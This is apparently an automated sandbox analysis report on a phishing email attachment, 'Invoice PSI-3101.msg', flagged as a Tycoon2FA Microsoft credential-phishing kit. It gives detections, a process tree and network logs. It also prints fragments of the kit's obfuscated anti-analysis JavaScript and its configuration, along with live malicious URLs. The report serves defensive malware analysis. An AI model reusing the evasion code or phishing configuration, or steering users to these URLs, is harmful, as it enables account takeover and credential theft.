Edit tour

Windows Analysis Report
Invoice PSI-3101.msg

Overview

General Information

Sample name:Invoice PSI-3101.msg
Analysis ID:1653720
MD5:3536b4e8a81a8b0360570cebfee561cf
SHA1:922dec2abb38489b1cdb9929565be89d296650bc
SHA256:f5f9378dd4f77fabbd11ae6cba7a424ddfc4c5d085add7808db87c5960f42f93
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score:100
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish10
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected suspicious Javascript
AI detected suspicious elements in Email content
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Sigma detected: Outlook Security Settings Updated - Registry
Stores large binary data to the registry
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 304 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\Invoice PSI-3101.msg" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 1964 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "643AB39A-A4E4-4758-A594-930BC2D63792" "56F205E5-1FF2-4C68-818E-FEEDCC33C8C1" "304" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • Acrobat.exe (PID: 2920 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\4WVQT9B6\Invoice PSI-3101.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 1200 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 4388 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2140 --field-trial-handle=1584,i,1292238551228575683,14951593506944596080,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • chrome.exe (PID: 6660 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://relaxationstudio.co.uk/pad2.pdf MD5: E81F54E6C1129887AEA47E7D092680BF)
        • chrome.exe (PID: 7064 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1936,i,4677847063298128573,9518573577152018583,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2212 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_174JoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
    SourceRuleDescriptionAuthorStrings
    0.0.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
      0.0.d.script.csvJoeSecurity_AntiDebugBrowserYara detected AntiDebug via timestamp checkJoe Security
        0.1.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
          0.1.d.script.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
            0.4.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
              Click to see the 16 entries
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 304, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
              Source: Registry Key setAuthor: frack113: Data: Details: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\4WVQT9B6\, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 304, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Security\OutlookSecureTempFolder
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              Phishing

              barindex
              Source: https://0cp.zlgbgfnebrnn.com/4woeJ3F2/Joe Sandbox AI: Score: 7 Reasons: The brand name 'd' is not sufficient to identify a specific brand or its associated domain., The URL '0cp.zlgbgfnebrnn.com' does not match any known legitimate domain associated with a recognizable brand., The domain name appears to be randomly generated and does not correspond to any known brand., The presence of a CAPTCHA input field is common in phishing sites to create a false sense of security., The URL contains a subdomain '0cp' which does not provide any recognizable brand association., The main domain 'zlgbgfnebrnn.com' is not associated with any known or well-known brand. DOM: 0.0.pages.csv
              Source: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL '0cp.zlgbgfnebrnn.com' does not match the legitimate domain for Microsoft., The URL contains a random string 'zlgbgfnebrnn' which is not associated with Microsoft., The subdomain '0cp' and the main domain 'zlgbgfnebrnn.com' are suspicious and do not relate to Microsoft., The presence of input fields for 'Email, phone, or Skype' is typical for phishing attempts targeting Microsoft services. DOM: 1.2.pages.csv
              Source: Yara matchFile source: 1.3.pages.csv, type: HTML
              Source: Yara matchFile source: 1.2.pages.csv, type: HTML
              Source: Yara matchFile source: 0.1.d.script.csv, type: HTML
              Source: Yara matchFile source: 0.0.pages.csv, type: HTML
              Source: Yara matchFile source: 0.1.d.script.csv, type: HTML
              Source: Yara matchFile source: 0.5..script.csv, type: HTML
              Source: Yara matchFile source: 0.0.pages.csv, type: HTML
              Source: Yara matchFile source: 1.19..script.csv, type: HTML
              Source: Yara matchFile source: dropped/chromecache_174, type: DROPPED
              Source: Yara matchFile source: 1.16.d.script.csv, type: HTML
              Source: Yara matchFile source: 0.0.d.script.csv, type: HTML
              Source: Yara matchFile source: 0.4.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.11..script.csv, type: HTML
              Source: Yara matchFile source: 0.9.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.12..script.csv, type: HTML
              Source: Yara matchFile source: 1.3.pages.csv, type: HTML
              Source: Yara matchFile source: 1.2.pages.csv, type: HTML
              Source: 0.5..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://0cp.zlgbgfnebrnn.com/4woeJ3F2/... This script demonstrates high-risk behavior, including dynamic code execution through the use of a Proxy object that evaluates decoded strings. The obfuscated nature of the code and the potential for remote code execution make this a high-risk script.
              Source: 0.2..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://0cp.zlgbgfnebrnn.com/4woeJ3F2/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code/URLs. The script appears to be attempting to redirect the user to a suspicious domain and potentially collect sensitive information. These behaviors are highly indicative of malicious intent, warranting a high-risk score.
              Source: 1.12..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdB... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It attempts to detect the presence of web automation tools, redirects to a suspicious domain, and implements various keyboard and context menu event handlers to prevent user interaction. These behaviors are highly indicative of malicious intent, warranting a high-risk score.
              Source: 1.11..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdB... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and aggressive DOM manipulation. It checks for the presence of web automation tools, redirects to a blank page, and intercepts various keyboard and clipboard events to prevent common debugging and security analysis techniques. Additionally, it includes an interval-based debugger trap that attempts to redirect the user to an external domain. These behaviors are highly suspicious and indicative of malicious intent, warranting a high-risk score.
              Source: 0.8..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://0cp.zlgbgfnebrnn.com/4woeJ3F2/... This script demonstrates several high-risk behaviors, including dynamic code execution, potential data exfiltration, and suspicious redirection. The use of the `Function` constructor to execute a base64-encoded string, along with the presence of code that checks for the existence of web driver or headless browser environments, suggests malicious intent. Additionally, the script sets up an interval that triggers a redirect to Google.com after a certain time threshold, which is highly suspicious. Overall, this script exhibits a clear pattern of malicious behavior and poses a significant security risk.
              Source: EmailJoe Sandbox AI: Detected potential phishing email: Suspicious identical 'from' and 'to' addresses both using 'Postmaster'. Generic invoice subject with PDF attachment is a common phishing tactic. Multiple embedded images could be used to bypass security filters
              Source: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEHTTP Parser: Number of links: 0
              Source: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEHTTP Parser: <input type="password" .../> found but no <form action="...
              Source: https://0cp.zlgbgfnebrnn.com/4woeJ3F2/HTTP Parser: Base64 decoded: if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) { window.location = "about:blank";}document.addEventListener("keydown", function (event) { function KXqiGfITbQ(event) { co...
              Source: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEHTTP Parser: Title: Secure Your Account Access does not match URL
              Source: https://0cp.zlgbgfnebrnn.com/4woeJ3F2/HTTP Parser: function ppiskllgrc(){nqbmsvbbvm = atob("pcfet0nuwvbfigh0bww+cjxodg1sigxhbmc9imvuij4kpghlywq+ciagpg1ldgegy2hhcnnldd0ivvrgltgipgogidxtzxrhig5hbwu9inzpzxdwb3j0iibjb250zw50psj3awr0ad1kzxzpy2utd2lkdggsigluaxrpywwtc2nhbgu9ms4wij4kica8dgl0bgu+rwr1vmlzaw9uic0gvhjhbnnmb3jtaw5nievkdwnhdglvbjwvdgl0bgu+ciagphn0ewxlpgogicagym9kesb7ciagicagigzvbnqtzmftawx5oianu2vnb2ugvuknlcbuywhvbwesiedlbmv2yswgvmvyzgfuyswgc2fucy1zzxjpzjskicagicagbwfyz2luoiawowogicagicbwywrkaw5noiawowogicagicbiywnrz3jvdw5klwnvbg9yoiajzjlmowy5owogicagicbjb2xvcjogizmzmzskicagih0kicagighlywrlcib7ciagicagigjhy2tncm91bmq6igxpbmvhci1ncmfkawvudcgxmzvkzwcsicm2ytexy2isicmyntc1zmmpowogicagicbjb2xvcjogi2zmzjskicagicagcgfkzgluzzognjbwecaymhb4owogicagicb0zxh0lwfsawduoibjzw50zxi7ciagicb9ciagicbozwfkzxigadegewogicagicbtyxjnaw46ida7ciagicagigzvbnqtc2l6ztogm3jlbtskicagicagzm9udc13zwlnahq6igjvbgq7ciagicb9ciagicbozwfkzxigccb7ciagicagigzvbnqtc2l6ztogms4ycmvtowogicagicbtyxjnaw4tdg9woiaxmhb4owogicagfqogicagbmf2ihskicagicagymfja2dyb3vuzdogcmdiysgyntusidi1nswgmju1lcawljkpowogi...
              Source: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEHTTP Parser: var otherweburl = "";var websitenames = ["godaddy", "okta"];var bes = ["apple.com","netflix.com"];var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me"];var capnum = 1;var appnum = 1;var pvn = 0;var view = "";var pagelinkval = "askq";var emailcheck = "0";var webname = "rtrim(/web8/, '/')";var urlo = "/nzdcmubpqq63g39vaxb1giwxvl8puoooavztansxhy5zudz";var gdf = "/ijkxd7w1aga2txi1ivql3uvldrxsptgiltgtufpycd120";var odf = "/ijv2phboanp4y99u4xxfriyucv7nuvnjtieumwggcd647";var twa = 0;var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "https://login.microsoftonline.com/common/sas/processauth";var useragent = navigator.useragent;var browsername;var userip;var usercountry;var errorcodeex...
              Source: EmailClassification: Invoice Scam
              Source: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEHTTP Parser: <input type="password" .../> found
              Source: https://0cp.zlgbgfnebrnn.com/4woeJ3F2/HTTP Parser: No favicon
              Source: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEHTTP Parser: No favicon
              Source: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEHTTP Parser: No <meta name="author".. found
              Source: https://0cp.zlgbgfnebrnn.com/tzglhszxrqqpgmyhiajdBXWXB50I8IS90CH?JWTQLNCZODPSGRQCMFEJEHTTP Parser: No <meta name="copyright".. found
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
              Source: unknownHTTPS traffic detected: 185.199.220.71:443 -> 192.168.2.17:49985 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.220.71:443 -> 192.168.2.17:49986 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.220.71:443 -> 192.168.2.17:49987 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.251.40.132:443 -> 192.168.2.17:49988 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.80:443 -> 192.168.2.17:49989 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.17:49996 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.17:49999 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.31.186:443 -> 192.168.2.17:50002 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.179.44:443 -> 192.168.2.17:50004 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.80:443 -> 192.168.2.17:50007 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.17:50008 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 140.82.114.4:443 -> 192.168.2.17:50019 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.91:443 -> 192.168.2.17:50020 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.91:443 -> 192.168.2.17:50022 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.91:443 -> 192.168.2.17:50021 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.110:443 -> 192.168.2.17:50025 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.17:50027 version: TLS 1.2
              Source: chrome.exeMemory has grown: Private usage: 1MB later: 36MB
              Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
              Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
              Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
              Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
              Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
              Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
              Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
              Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
              Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
              Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
              Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
              Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
              Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
              Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
              Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
              Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
              Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
              Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
              Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
              Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
              Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
              Source: unknownTCP traffic detected without corresponding DNS query: 185.199.220.71
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /pad2.pdf HTTP/1.1Host: relaxationstudio.co.ukConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CLf3ygE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /4woeJ3F2/ HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://0cp.zlgbgfnebrnn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0cp.zlgbgfnebrnn.com/4woeJ3F2/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjBLYjNqZEtxVHNHeVJjanpORnd1aEE9PSIsInZhbHVlIjoiUm8wdUloLzN0Q0RPTTl5ZHc1bUNFN1NIbExNVk1JYlZ5Z1ZqVHJTNG4xUHE3QVpjdHNXa3E1dWRnS2xka3JWV3ZCSnVCeXNQMGc0KzVGNmxJUGxBTVErcm9CU1k3WnRoY0dEalo0S0NSdjhLK2JIUnZpVENjVzhPeFlJeitFZm4iLCJtYWMiOiJiMDA2ZWQ1MjJiNjc5YjZhNzFlOWFiMDMyMzUyZDc5YmFkMmIwM2QyOTgzM2VmNGIxYTE0NjBmNmQ3N2Y0NzJmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImxUVndjNHNUdnFSUHlnWkNVN3VYRVE9PSIsInZhbHVlIjoibk9RRjdnZTdCQmljWjZtVlJ4RHlDVGN4QWdjSmJtb214aGFRN0RWdkc5YmczVkpwRzZpZHp1TzhtMlo2TUtpRXB2YVJvTWxPL0J1OEd1YUV3dFlzQ3drRHNjcVM3YjlnNCtjUUdsRnVnbEZvd3pQZkd4WUV2d0h1cE1ZT1VSM2ciLCJtYWMiOiI5ODU0YjI4MDkyY2I3MGE1ZDcxZjUxMTcyMWMwMTA4YTUxODZiY2JlZTM5MjEwYTY3ZTAyOGQ4NDA1NDc2N2U4IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /chai@6bdrysu HTTP/1.1Host: nzt0.kqnsgn.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://0cp.zlgbgfnebrnn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://0cp.zlgbgfnebrnn.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /chai@6bdrysu HTTP/1.1Host: nzt0.kqnsgn.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /4woeJ3F2/ HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://0cp.zlgbgfnebrnn.com/4woeJ3F2/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ik56T3lRRmFIa2dETjVrM1dQNWY1V3c9PSIsInZhbHVlIjoiamxnSVBzclVwbjM1cG1ZNDh0Ni9WK0lCQnh4VmxPMmlEdmV5YWhFQXowR1Rva1FocGtLNVRtd2ZMY1FRZUlRY2F2YnJSWWZQZXVOaTFFTjhySXJPN0ZEVitkekV5cXdMTnd0Z3hSUEFIeW1jajNqU2ZaU29ENVpIQ01VdXBUbGciLCJtYWMiOiIyY2I0NjM3MjY5NTYwNThmMGU5ZTJhNGYwYTNlYjlkMDViYTIyOTQ3NTg3NDY2NTE2ZGM1M2FhOTYxYjkzY2Y2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik9qVnVSMGdnUE1MYWZRZEdxa3dZV2c9PSIsInZhbHVlIjoicXM4YkFucnVhR3preGxBRGQzQUQxajJidnZiazNDWVpFc1laWjBiNlRTWmJuRVpidkw1OHNIMzd1K1F4RzBRUXJ2cllRTXhKaDBYRnNwZHVJcmliNGdja0NSakM3cVNEU3RQLzVDNE5ucHFCVnU2SlVIdG1JM1FKVFZrd3RESk4iLCJtYWMiOiIzZmRiNmM1NGE4OWM4YTIwYmU1ODM3ZDNkNTllMjU3OGMyYmI4ZDQ2ZGRjNTZiM2E3Y2ZhZDk2NTlkM2ZlMzY2IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /cl8ulBsJBaxoP9RbS4pqa4Es72Hmt9sFqVDaMcAJkj HTTP/1.1Host: 0cp.zlgbgfnebrnn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ik56T3lRRmFIa2dETjVrM1dQNWY1V3c9PSIsInZhbHVlIjoiamxnSVBzclVwbjM1cG1ZNDh0Ni9WK0lCQnh4VmxPMmlEdmV5YWhFQXowR1Rva1FocGtLNVRtd2ZMY1FRZUlRY2F2YnJSWWZQZXVOaTFFTjhySXJPN0ZEVitkekV5cXdMTnd0Z3hSUEFIeW1jajNqU2ZaU29ENVpIQ01VdXBUbGciLCJtYWMiOiIyY2I0NjM3MjY5NTYwNThmMGU5ZTJhNGYwYTNlYjlkMDViYTIyOTQ3NTg3NDY2NTE2ZGM1M2FhOTYxYjkzY2Y2IiwidGFnIjoiIn0%3D; 